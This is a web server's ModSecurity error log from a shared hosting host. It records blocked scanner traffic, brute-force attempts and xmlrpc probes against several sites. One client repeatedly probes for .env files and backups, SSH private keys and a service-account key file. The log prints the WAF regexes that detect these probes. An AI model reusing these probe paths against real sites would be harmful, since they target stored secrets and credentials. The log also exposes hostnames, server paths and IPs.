[Tue May 26 19:02:32.388250 2026] [security2:error] [pid 1045635:tid 1045871] [client 23.158.233.122:63548] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWg8BhDcQXYr7SS5sUeVwAAAGo"], referer: https://www.cagmedya.com/web-tasarim/
[Tue May 26 19:02:32.420636 2026] [security2:error] [pid 1045635:tid 1045815] [client 5.255.99.53:54002] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWg7xhDcQXYr7SS5sUeOgAAADI"]
[Tue May 26 19:02:32.734420 2026] [security2:error] [pid 1045635:tid 1045817] [client 23.158.233.122:63576] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWg8BhDcQXYr7SS5sUeZwAAADQ"], referer: https://www.cagmedya.com/web-tasarim/
[Tue May 26 19:02:32.936057 2026] [security2:error] [pid 1045635:tid 1045772] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWg8BhDcQXYr7SS5sUeZgAAAAc"]
[Tue May 26 19:02:34.436293 2026] [security2:error] [pid 1045635:tid 1045801] [client 5.255.99.53:54002] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWg8RhDcQXYr7SS5sUefQAAACQ"]
[Tue May 26 19:02:34.779657 2026] [security2:error] [pid 1045635:tid 1045772] [client 20.206.67.134:3734] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/hwmlqyzw.php"] [unique_id "ahWg8hhDcQXYr7SS5sUepwAAAAc"], referer: www.google.com
[Tue May 26 19:02:34.781149 2026] [security2:error] [pid 1045635:tid 1045861] [client 20.206.67.134:3664] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahWg8hhDcQXYr7SS5sUeqAAAAGA"]
[Tue May 26 19:02:34.811519 2026] [security2:error] [pid 1045635:tid 1045851] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWg8hhDcQXYr7SS5sUemQAAAFY"]
[Tue May 26 19:02:35.570808 2026] [security2:error] [pid 1045635:tid 1045858] [client 5.255.99.53:54002] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWg8hhDcQXYr7SS5sUeowAAAF0"]
[Tue May 26 19:02:35.666752 2026] [security2:error] [pid 1045635:tid 1045885] [client 45.155.141.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWg8xhDcQXYr7SS5sUetwAAAHg"]
[Tue May 26 19:02:36.139369 2026] [security2:error] [pid 1045635:tid 1045832] [client 20.206.67.134:5508] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWg9BhDcQXYr7SS5sUe0AAAAEM"], referer: www.google.com
[Tue May 26 19:02:36.903232 2026] [security2:error] [pid 1045635:tid 1045872] [client 20.206.67.134:3657] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahWg8xhDcQXYr7SS5sUeyAAAAGs"], referer: www.google.com
[Tue May 26 19:02:36.966346 2026] [security2:error] [pid 1045635:tid 1045812] [client 5.255.99.53:54002] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWg9BhDcQXYr7SS5sUezwAAAC8"]
[Tue May 26 19:02:37.456507 2026] [security2:error] [pid 1045635:tid 1045825] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWg9RhDcQXYr7SS5sUe6AAAADw"]
[Tue May 26 19:02:38.764452 2026] [security2:error] [pid 1045635:tid 1045806] [client 5.255.99.53:54002] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWg9RhDcQXYr7SS5sUe-gAAACk"]
[Tue May 26 19:02:39.214892 2026] [security2:error] [pid 1045635:tid 1045738] [remote 212.224.100.2:49564] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 2.100.224.212.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWg9xhDcQXYr7SS5sUfGAAAOGY"]
[Tue May 26 19:02:39.286517 2026] [security2:error] [pid 1045635:tid 1045810] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWg9hhDcQXYr7SS5sUfFAAAAC0"]
[Tue May 26 19:02:39.456957 2026] [security2:error] [pid 1045635:tid 1045742] [remote 212.224.100.2:49564] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 2.100.224.212.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWg9xhDcQXYr7SS5sUfJAAAGWo"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:02:40.057276 2026] [security2:error] [pid 1045635:tid 1045818] [client 5.255.99.53:54002] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWg9xhDcQXYr7SS5sUfGQAAADU"]
[Tue May 26 19:02:40.700233 2026] [security2:error] [pid 1045635:tid 1045776] [client 20.206.67.134:5504] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahWg-BhDcQXYr7SS5sUfRQAAAAs"]
[Tue May 26 19:02:40.991542 2026] [security2:error] [pid 1045635:tid 1045783] [client 20.206.67.134:5504] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-plain.php"] [unique_id "ahWg-BhDcQXYr7SS5sUfUQAAABI"], referer: www.google.com
[Tue May 26 19:02:41.599151 2026] [security2:error] [pid 1045635:tid 1045821] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWg-RhDcQXYr7SS5sUfVQAAADg"]
[Tue May 26 19:02:41.720181 2026] [security2:error] [pid 1045635:tid 1045815] [client 20.206.67.134:3657] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahWg-BhDcQXYr7SS5sUfSQAAADI"], referer: www.google.com
[Tue May 26 19:02:41.900431 2026] [security2:error] [pid 1045635:tid 1045833] [client 5.255.99.53:54002] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWg-BhDcQXYr7SS5sUfUAAAAEQ"]
[Tue May 26 19:02:43.071836 2026] [security2:error] [pid 1045635:tid 1045787] [client 5.255.99.53:54002] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWg-hhDcQXYr7SS5sUfbwAAABY"]
[Tue May 26 19:02:43.373548 2026] [security2:error] [pid 1045635:tid 1045858] [client 20.206.67.134:3657] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahWg-hhDcQXYr7SS5sUfdwAAAF0"], referer: www.google.com
[Tue May 26 19:02:44.610744 2026] [security2:error] [pid 1045635:tid 1045807] [client 5.255.99.53:54002] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWg-xhDcQXYr7SS5sUfiQAAACo"]
[Tue May 26 19:02:44.693892 2026] [security2:error] [pid 1045635:tid 1045779] [client 20.206.67.134:3760] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahWg_BhDcQXYr7SS5sUfnAAAAA4"]
[Tue May 26 19:02:44.811663 2026] [security2:error] [pid 1045635:tid 1045860] [client 143.105.49.48:59104] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 48.49.105.143.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rakeshdewan.com"] [uri "/xmlrpc.php"] [unique_id "ahWg_BhDcQXYr7SS5sUfmwAAAF8"]
[Tue May 26 19:02:44.811866 2026] [security2:error] [pid 1045635:tid 1045860] [client 143.105.49.48:59104] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "rakeshdewan.com"] [uri "/xmlrpc.php"] [unique_id "ahWg_BhDcQXYr7SS5sUfmwAAAF8"]
[Tue May 26 19:02:45.482462 2026] [security2:error] [pid 1045635:tid 1045826] [client 20.206.67.134:3749] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/rpnefbva.php"] [unique_id "ahWg_RhDcQXYr7SS5sUfpgAAAD0"], referer: www.google.com
[Tue May 26 19:02:45.852431 2026] [security2:error] [pid 1045635:tid 1045877] [client 5.255.99.53:54002] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWg_BhDcQXYr7SS5sUfnQAAAHA"]
[Tue May 26 19:02:47.088478 2026] [security2:error] [pid 1045635:tid 1045878] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWg_hhDcQXYr7SS5sUfwgAAAHE"]
[Tue May 26 19:02:47.382817 2026] [security2:error] [pid 1045635:tid 1045817] [client 5.255.99.53:54002] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWg_hhDcQXYr7SS5sUfugAAADQ"]
[Tue May 26 19:02:48.732889 2026] [security2:error] [pid 1045635:tid 1045881] [client 5.255.99.53:54002] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWg_xhDcQXYr7SS5sUfzgAAAHQ"]
[Tue May 26 19:02:49.150145 2026] [security2:error] [pid 1045635:tid 1045785] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhABhDcQXYr7SS5sUf3wAAABQ"]
[Tue May 26 19:02:50.305530 2026] [security2:error] [pid 1045635:tid 1045847] [client 5.255.99.53:54002] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhARhDcQXYr7SS5sUf5gAAAFI"]
[Tue May 26 19:02:51.357392 2026] [security2:error] [pid 1045635:tid 1045854] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhAhhDcQXYr7SS5sUgCwAAAFk"]
[Tue May 26 19:02:51.564773 2026] [security2:error] [pid 1045635:tid 1045783] [client 5.255.99.53:54002] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhAhhDcQXYr7SS5sUf-wAAABI"]
[Tue May 26 19:02:52.810104 2026] [security2:error] [pid 1045635:tid 1045818] [client 5.255.99.53:54002] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhAxhDcQXYr7SS5sUgJgAAADU"]
[Tue May 26 19:02:53.607766 2026] [security2:error] [pid 1045635:tid 1045836] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhBRhDcQXYr7SS5sUgSQAAAEc"]
[Tue May 26 19:02:54.246867 2026] [security2:error] [pid 1045635:tid 1045824] [client 5.255.99.53:53364] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "rohiniventures.com"] [uri "/.env.bak"] [unique_id "ahWhBhhDcQXYr7SS5sUgagAAADs"]
[Tue May 26 19:02:54.259476 2026] [authz_core:error] [pid 1045635:tid 1045773] [client 5.255.99.53:53534] AH01630: client denied by server configuration: /home2/aarindhr/public_html/rohiniventures.com/keys/service-account.json
[Tue May 26 19:02:54.439977 2026] [security2:error] [pid 1045635:tid 1045800] [client 5.255.99.53:53442] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "rohiniventures.com"] [uri "/public/.env"] [unique_id "ahWhBhhDcQXYr7SS5sUgiAAAACM"]
[Tue May 26 19:02:54.487939 2026] [security2:error] [pid 1045635:tid 1045812] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhBRhDcQXYr7SS5sUgYAAAAC8"]
[Tue May 26 19:02:55.164497 2026] [security2:error] [pid 1045635:tid 1045772] [client 5.255.99.53:53252] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhBhhDcQXYr7SS5sUgbQAAAAc"]
[Tue May 26 19:02:55.169852 2026] [security2:error] [pid 1045635:tid 1045776] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhBhhDcQXYr7SS5sUgfgAAAAs"]
[Tue May 26 19:02:55.173496 2026] [security2:error] [pid 1045635:tid 1045837] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhBhhDcQXYr7SS5sUgggAAAEg"]
[Tue May 26 19:02:55.175049 2026] [security2:error] [pid 1045635:tid 1045823] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhBhhDcQXYr7SS5sUgewAAADo"]
[Tue May 26 19:02:55.178834 2026] [security2:error] [pid 1045635:tid 1045792] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhBhhDcQXYr7SS5sUghAAAABs"]
[Tue May 26 19:02:55.206361 2026] [security2:error] [pid 1045635:tid 1045862] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhBhhDcQXYr7SS5sUggQAAAGE"]
[Tue May 26 19:02:55.216380 2026] [security2:error] [pid 1045635:tid 1045857] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhBhhDcQXYr7SS5sUgfwAAAFw"]
[Tue May 26 19:02:55.239822 2026] [security2:error] [pid 1045635:tid 1045770] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhBhhDcQXYr7SS5sUggwAAAAU"]
[Tue May 26 19:02:55.401935 2026] [security2:error] [pid 1045635:tid 1045839] [client 5.255.99.53:53546] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhBhhDcQXYr7SS5sUghwAAAEo"]
[Tue May 26 19:02:55.406802 2026] [security2:error] [pid 1045635:tid 1045848] [client 5.255.99.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWhBhhDcQXYr7SS5sUgigAAAFM"]
[Tue May 26 19:02:55.624100 2026] [security2:error] [pid 1045635:tid 1045774] [client 5.255.99.53:53574] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "rohiniventures.com"] [uri "/.env"] [unique_id "ahWhBxhDcQXYr7SS5sUgtAAAAAk"]
[Tue May 26 19:02:55.695194 2026] [security2:error] [pid 1045635:tid 1045821] [client 5.255.99.53:53436] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "rohiniventures.com"] [uri "/app/.env"] [unique_id "ahWhBxhDcQXYr7SS5sUgvgAAADg"]
[Tue May 26 19:02:55.826610 2026] [security2:error] [pid 1045635:tid 1045841] [client 5.255.99.53:53314] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "rohiniventures.com"] [uri "/.env.old"] [unique_id "ahWhBxhDcQXYr7SS5sUgygAAAEw"]
[Tue May 26 19:02:55.838866 2026] [security2:error] [pid 1045635:tid 1045868] [client 5.255.99.53:53408] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "rohiniventures.com"] [uri "/.env.backup"] [unique_id "ahWhBxhDcQXYr7SS5sUgywAAAGc"]
[Tue May 26 19:02:55.902861 2026] [security2:error] [pid 1045635:tid 1045886] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhBxhDcQXYr7SS5sUgpQAAAHk"]
[Tue May 26 19:02:55.914584 2026] [security2:error] [pid 1045635:tid 1045846] [client 5.255.99.53:53546] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "rohiniventures.com"] [uri "/api/.env"] [unique_id "ahWhBxhDcQXYr7SS5sUg2QAAAFE"]
[Tue May 26 19:02:56.092827 2026] [security2:error] [pid 1045635:tid 1045843] [client 5.255.99.53:53574] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "rohiniventures.com"] [uri "/backend/.env"] [unique_id "ahWhCBhDcQXYr7SS5sUg3QAAAE4"]
[Tue May 26 19:02:56.321932 2026] [security2:error] [pid 1045635:tid 1045871] [client 5.255.99.53:53546] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "rohiniventures.com"] [uri "/.ssh/id_dsa"] [unique_id "ahWhCBhDcQXYr7SS5sUg6gAAAGo"]
